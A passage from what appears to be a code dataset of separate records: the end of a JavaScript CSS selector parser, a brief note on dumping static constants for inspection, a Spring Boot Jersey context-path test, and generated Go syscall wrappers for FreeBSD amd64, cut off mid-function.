0x10000 ) :\n\t\t\t// Supplemental Plane codepoint (surrogate pair)\n\t\t\tString.fromCharCode( high >> 10 | 0xD800, high & 0x3FF | 0xDC00 );\n}\n\nfunction unescapeCSS(str){\n\treturn str.replace(re_escape, funescape);\n}\n\nfunction isWhitespace(c){\n\treturn c === \" \" || c === \"\\n\" || c === \"\\t\" || c === \"\\f\" || c === \"\\r\";\n}\n\nfunction parse(selector, options){\n\tvar subselects = [];\n\n\tselector = parseSelector(subselects, selector + \"\", options);\n\n\tif(selector !== \"\"){\n\t\tthrow new SyntaxError(\"Unmatched selector: \" + selector);\n\t}\n\n\treturn subselects;\n}\n\nfunction parseSelector(subselects, selector, options){\n\tvar tokens = [],\n\t\tsawWS = false,\n\t\tdata, firstChar, name, quot;\n\n\tfunction getName(){\n\t\tvar sub = selector.match(re_name)[0];\n\t\tselector = selector.substr(sub.length);\n\t\treturn unescapeCSS(sub);\n\t}\n\n\tfunction stripWhitespace(start){\n\t\twhile(isWhitespace(selector.charAt(start))) start++;\n\t\tselector = selector.substr(start);\n\t}\n\n\tstripWhitespace(0);\n\n\twhile(selector !== \"\"){\n\t\tfirstChar = selector.charAt(0);\n\n\t\tif(isWhitespace(firstChar)){\n\t\t\tsawWS = true;\n\t\t\tstripWhitespace(1);\n\t\t} else if(firstChar in simpleSelectors){\n\t\t\ttokens.push({type: simpleSelectors[firstChar]});\n\t\t\tsawWS = false;\n\n\t\t\tstripWhitespace(1);\n\t\t} else if(firstChar === \",\"){\n\t\t\tif(tokens.length === 0){\n\t\t\t\tthrow new SyntaxError(\"empty sub-selector\");\n\t\t\t}\n\t\t\tsubselects.push(tokens);\n\t\t\ttokens = [];\n\t\t\tsawWS = false;\n\t\t\tstripWhitespace(1);\n\t\t} else {\n\t\t\tif(sawWS){\n\t\t\t\tif(tokens.length > 0){\n\t\t\t\t\ttokens.push({type: \"descendant\"});\n\t\t\t\t}\n\t\t\t\tsawWS = false;\n\t\t\t}\n\n\t\t\tif(firstChar === \"*\"){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\ttokens.push({type: \"universal\"});\n\t\t\t} else if(firstChar in attribSelectors){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\ttokens.push({\n\t\t\t\t\ttype: \"attribute\",\n\t\t\t\t\tname: attribSelectors[firstChar][0],\n\t\t\t\t\taction: attribSelectors[firstChar][1],\n\t\t\t\t\tvalue: getName(),\n\t\t\t\t\tignoreCase: false\n\t\t\t\t});\n\t\t\t} else if(firstChar === \"[\"){\n\t\t\t\tselector = selector.substr(1);\n\t\t\t\tdata = selector.match(re_attr);\n\t\t\t\tif(!data){\n\t\t\t\t\tthrow new SyntaxError(\"Malformed attribute selector: \" + selector);\n\t\t\t\t}\n\t\t\t\tselector = selector.substr(data[0].length);\n\t\t\t\tname = unescapeCSS(data[1]);\n\n\t\t\t\tif(\n\t\t\t\t\t!options || (\n\t\t\t\t\t\t\"lowerCaseAttributeNames\" in options ?\n\t\t\t\t\t\t\toptions.lowerCaseAttributeNames :\n\t\t\t\t\t\t\t!options.xmlMode\n\t\t\t\t\t)\n\t\t\t\t){\n\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t}\n\n\t\t\t\ttokens.push({\n\t\t\t\t\ttype: \"attribute\",\n\t\t\t\t\tname: name,\n\t\t\t\t\taction: actionTypes[data[2]],\n\t\t\t\t\tvalue: unescapeCSS(data[4] || data[5] || \"\"),\n\t\t\t\t\tignoreCase: !!data[6]\n\t\t\t\t});\n\n\t\t\t} else if(firstChar === \":\"){\n\t\t\t\tif(selector.charAt(1) === \":\"){\n\t\t\t\t\tselector = selector.substr(2);\n\t\t\t\t\ttokens.push({type: \"pseudo-element\", name: getName().toLowerCase()});\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tselector = selector.substr(1);\n\n\t\t\t\tname = getName().toLowerCase();\n\t\t\t\tdata = null;\n\n\t\t\t\tif(selector.charAt(0) === \"(\"){\n\t\t\t\t\tif(name in unpackPseudos){\n\t\t\t\t\t\tquot = selector.charAt(1);\n\t\t\t\t\t\tvar quoted = quot in quotes;\n\n\t\t\t\t\t\tselector = selector.substr(quoted + 
1);\n\n\t\t\t\t\t\tdata = [];\n\t\t\t\t\t\tselector = parseSelector(data, selector, options);\n\n\t\t\t\t\t\tif(quoted){\n\t\t\t\t\t\t\tif(selector.charAt(0) !== quot){\n\t\t\t\t\t\t\t\tthrow new SyntaxError(\"unmatched quotes in :\" + name);\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\tselector = selector.substr(1);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif(selector.charAt(0) !== \")\"){\n\t\t\t\t\t\t\tthrow new SyntaxError(\"missing closing parenthesis in :\" + name + \" \" + selector);\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tselector = selector.substr(1);\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvar pos = 1, counter = 1;\n\n\t\t\t\t\t\tfor(; counter > 0 && pos < selector.length; pos++){\n\t\t\t\t\t\t\tif(selector.charAt(pos) === \"(\") counter++;\n\t\t\t\t\t\t\telse if(selector.charAt(pos) === \")\") counter--;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tif(counter){\n\t\t\t\t\t\t\tthrow new SyntaxError(\"parenthesis not matched\");\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tdata = selector.substr(1, pos - 2);\n\t\t\t\t\t\tselector = selector.substr(pos);\n\n\t\t\t\t\t\tif(name in stripQuotesFromPseudos){\n\t\t\t\t\t\t\tquot = data.charAt(0);\n\n\t\t\t\t\t\t\tif(quot === data.slice(-1) && quot in quotes){\n\t\t\t\t\t\t\t\tdata = data.slice(1, -1);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tdata = unescapeCSS(data);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\ttokens.push({type: \"pseudo\", name: name, data: data});\n\t\t\t} else if(re_name.test(selector)){\n\t\t\t\tname = getName();\n\n\t\t\t\tif(!options || (\"lowerCaseTags\" in options ? options.lowerCaseTags : !options.xmlMode)){\n\t\t\t\t\tname = name.toLowerCase();\n\t\t\t\t}\n\n\t\t\t\ttokens.push({type: \"tag\", name: name});\n\t\t\t} else {\n\t\t\t\tif(tokens.length && tokens[tokens.length - 1].type === \"descendant\"){\n\t\t\t\t\ttokens.pop();\n\t\t\t\t}\n\t\t\t\taddToken(subselects, tokens);\n\t\t\t\treturn selector;\n\t\t\t}\n\t\t}\n\t}\n\n\taddToken(subselects, tokens);\n\n\treturn selector;\n}\n\nfunction addToken(subselects, tokens){\n\tif(subselects.length > 0 && tokens.length === 0){\n\t\tthrow new SyntaxError(\"empty sub-selector\");\n\t}\n\n\tsubselects.push(tokens);\n}\n"} {"text": "Dump information about static prebuilt constants, to the file\nTARGETNAME.staticdata.info in the /tmp/usession-... directory. 
This file can\nbe later inspected using the script ``bin/reportstaticdata.py``.\n"} {"text": "/*\n * Copyright 2012-2019 the original author or authors.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * https://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage org.springframework.boot.autoconfigure.jersey;\n\nimport java.lang.annotation.Documented;\nimport java.lang.annotation.ElementType;\nimport java.lang.annotation.Retention;\nimport java.lang.annotation.RetentionPolicy;\nimport java.lang.annotation.Target;\n\nimport javax.ws.rs.ApplicationPath;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\n\nimport org.glassfish.jersey.server.ResourceConfig;\nimport org.junit.jupiter.api.Test;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.annotation.Value;\nimport org.springframework.boot.SpringApplication;\nimport org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration;\nimport org.springframework.boot.autoconfigure.web.servlet.ServletWebServerFactoryAutoConfiguration;\nimport org.springframework.boot.test.context.SpringBootTest;\nimport org.springframework.boot.test.context.SpringBootTest.WebEnvironment;\nimport org.springframework.boot.test.web.client.TestRestTemplate;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.context.annotation.Import;\nimport org.springframework.http.HttpStatus;\nimport org.springframework.http.ResponseEntity;\nimport org.springframework.test.annotation.DirtiesContext;\n\nimport static org.assertj.core.api.Assertions.assertThat;\n\n/**\n * Tests for {@link JerseyAutoConfiguration} when using custom servlet paths.\n *\n * @author Dave Syer\n */\n@SpringBootTest(webEnvironment = WebEnvironment.RANDOM_PORT, properties = \"server.servlet.contextPath=/app\")\n@DirtiesContext\nclass JerseyAutoConfigurationCustomServletContextPathTests {\n\n\t@Autowired\n\tprivate TestRestTemplate restTemplate;\n\n\t@Test\n\tvoid contextLoads() {\n\t\tResponseEntity entity = this.restTemplate.getForEntity(\"/rest/hello\", String.class);\n\t\tassertThat(entity.getStatusCode()).isEqualTo(HttpStatus.OK);\n\t}\n\n\t@MinimalWebConfiguration\n\t@ApplicationPath(\"/rest\")\n\t@Path(\"/hello\")\n\tpublic static class Application extends ResourceConfig {\n\n\t\t@Value(\"${message:World}\")\n\t\tprivate String msg;\n\n\t\tApplication() {\n\t\t\tregister(Application.class);\n\t\t}\n\n\t\t@GET\n\t\tpublic String message() {\n\t\t\treturn \"Hello \" + this.msg;\n\t\t}\n\n\t\tstatic void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Configuration\n\t@Import({ ServletWebServerFactoryAutoConfiguration.class, JerseyAutoConfiguration.class,\n\t\t\tPropertyPlaceholderAutoConfiguration.class })\n\tprotected @interface MinimalWebConfiguration {\n\n\t}\n\n}\n"} {"text": "// mksyscall.pl -tags freebsd,amd64 syscall_bsd.go syscall_freebsd.go syscall_freebsd_amd64.go\n// Code generated 
by the command above; see README.md. DO NOT EDIT.\n\n// +build freebsd,amd64\n\npackage unix\n\nimport (\n\t\"syscall\"\n\t\"unsafe\"\n)\n\nvar _ syscall.Errno\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getgroups(ngid int, gid *_Gid_t) (n int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETGROUPS, uintptr(ngid), uintptr(unsafe.Pointer(gid)), 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc setgroups(ngid int, gid *_Gid_t) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETGROUPS, uintptr(ngid), uintptr(unsafe.Pointer(gid)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid int, err error) {\n\tr0, _, e1 := Syscall6(SYS_WAIT4, uintptr(pid), uintptr(unsafe.Pointer(wstatus)), uintptr(options), uintptr(unsafe.Pointer(rusage)), 0, 0)\n\twpid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err error) {\n\tr0, _, e1 := Syscall(SYS_ACCEPT, uintptr(s), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) {\n\t_, _, e1 := Syscall(SYS_BIND, uintptr(s), uintptr(addr), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) {\n\t_, _, e1 := Syscall(SYS_CONNECT, uintptr(s), uintptr(addr), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc socket(domain int, typ int, proto int) (fd int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_SOCKET, uintptr(domain), uintptr(typ), uintptr(proto))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *_Socklen) (err error) {\n\t_, _, e1 := Syscall6(SYS_GETSOCKOPT, uintptr(s), uintptr(level), uintptr(name), uintptr(val), uintptr(unsafe.Pointer(vallen)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc setsockopt(s int, level int, name int, val unsafe.Pointer, vallen uintptr) (err error) {\n\t_, _, e1 := Syscall6(SYS_SETSOCKOPT, uintptr(s), uintptr(level), uintptr(name), uintptr(val), uintptr(vallen), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETPEERNAME, uintptr(fd), uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETSOCKNAME, uintptr(fd), 
uintptr(unsafe.Pointer(rsa)), uintptr(unsafe.Pointer(addrlen)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Shutdown(s int, how int) (err error) {\n\t_, _, e1 := Syscall(SYS_SHUTDOWN, uintptr(s), uintptr(how), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) {\n\t_, _, e1 := RawSyscall6(SYS_SOCKETPAIR, uintptr(domain), uintptr(typ), uintptr(proto), uintptr(unsafe.Pointer(fd)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen *_Socklen) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_RECVFROM, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(flags), uintptr(unsafe.Pointer(from)), uintptr(unsafe.Pointer(fromlen)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _Socklen) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall6(SYS_SENDTO, uintptr(s), uintptr(_p0), uintptr(len(buf)), uintptr(flags), uintptr(to), uintptr(addrlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc recvmsg(s int, msg *Msghdr, flags int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_RECVMSG, uintptr(s), uintptr(unsafe.Pointer(msg)), uintptr(flags))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sendmsg(s int, msg *Msghdr, flags int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_SENDMSG, uintptr(s), uintptr(unsafe.Pointer(msg)), uintptr(flags))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Pointer, nevent int, timeout *Timespec) (n int, err error) {\n\tr0, _, e1 := Syscall6(SYS_KEVENT, uintptr(kq), uintptr(change), uintptr(nchange), uintptr(event), uintptr(nevent), uintptr(unsafe.Pointer(timeout)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen uintptr) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(mib) > 0 {\n\t\t_p0 = unsafe.Pointer(&mib[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall6(SYS___SYSCTL, uintptr(_p0), uintptr(len(mib)), uintptr(unsafe.Pointer(old)), uintptr(unsafe.Pointer(oldlen)), uintptr(unsafe.Pointer(new)), uintptr(newlen))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc utimes(path string, timeval *[2]Timeval) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_UTIMES, 
uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(timeval)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc futimes(fd int, timeval *[2]Timeval) (err error) {\n\t_, _, e1 := Syscall(SYS_FUTIMES, uintptr(fd), uintptr(unsafe.Pointer(timeval)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc fcntl(fd int, cmd int, arg int) (val int, err error) {\n\tr0, _, e1 := Syscall(SYS_FCNTL, uintptr(fd), uintptr(cmd), uintptr(arg))\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc poll(fds *PollFd, nfds int, timeout int) (n int, err error) {\n\tr0, _, e1 := Syscall(SYS_POLL, uintptr(unsafe.Pointer(fds)), uintptr(nfds), uintptr(timeout))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Madvise(b []byte, behav int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MADVISE, uintptr(_p0), uintptr(len(b)), uintptr(behav))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mlock(b []byte) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MLOCK, uintptr(_p0), uintptr(len(b)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mlockall(flags int) (err error) {\n\t_, _, e1 := Syscall(SYS_MLOCKALL, uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mprotect(b []byte, prot int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MPROTECT, uintptr(_p0), uintptr(len(b)), uintptr(prot))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Msync(b []byte, flags int) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MSYNC, uintptr(_p0), uintptr(len(b)), uintptr(flags))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Munlock(b []byte) (err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(b) > 0 {\n\t\t_p0 = unsafe.Pointer(&b[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\t_, _, e1 := Syscall(SYS_MUNLOCK, uintptr(_p0), uintptr(len(b)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Munlockall() (err error) {\n\t_, _, e1 := Syscall(SYS_MUNLOCKALL, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc pipe2(p *[2]_C_int, flags int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_PIPE2, uintptr(unsafe.Pointer(p)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = 
errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getcwd(buf []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS___GETCWD, uintptr(_p0), uintptr(len(buf)), 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc ioctl(fd int, req uint, arg uintptr) (err error) {\n\t_, _, e1 := Syscall(SYS_IOCTL, uintptr(fd), uintptr(req), uintptr(arg))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Access(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_ACCESS, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Adjtime(delta *Timeval, olddelta *Timeval) (err error) {\n\t_, _, e1 := Syscall(SYS_ADJTIME, uintptr(unsafe.Pointer(delta)), uintptr(unsafe.Pointer(olddelta)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc CapEnter() (err error) {\n\t_, _, e1 := Syscall(SYS_CAP_ENTER, 0, 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc capRightsGet(version int, fd int, rightsp *CapRights) (err error) {\n\t_, _, e1 := Syscall(SYS___CAP_RIGHTS_GET, uintptr(version), uintptr(fd), uintptr(unsafe.Pointer(rightsp)))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc capRightsLimit(fd int, rightsp *CapRights) (err error) {\n\t_, _, e1 := Syscall(SYS_CAP_RIGHTS_LIMIT, uintptr(fd), uintptr(unsafe.Pointer(rightsp)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chdir(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHDIR, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chflags(path string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHFLAGS, uintptr(unsafe.Pointer(_p0)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chmod(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHMOD, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chown(path string, uid int, gid int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHOWN, uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// 
THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Chroot(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_CHROOT, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Close(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_CLOSE, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Dup(fd int) (nfd int, err error) {\n\tr0, _, e1 := Syscall(SYS_DUP, uintptr(fd), 0, 0)\n\tnfd = int(r0)\n\tif e1 != 0 {\n\t\terr = 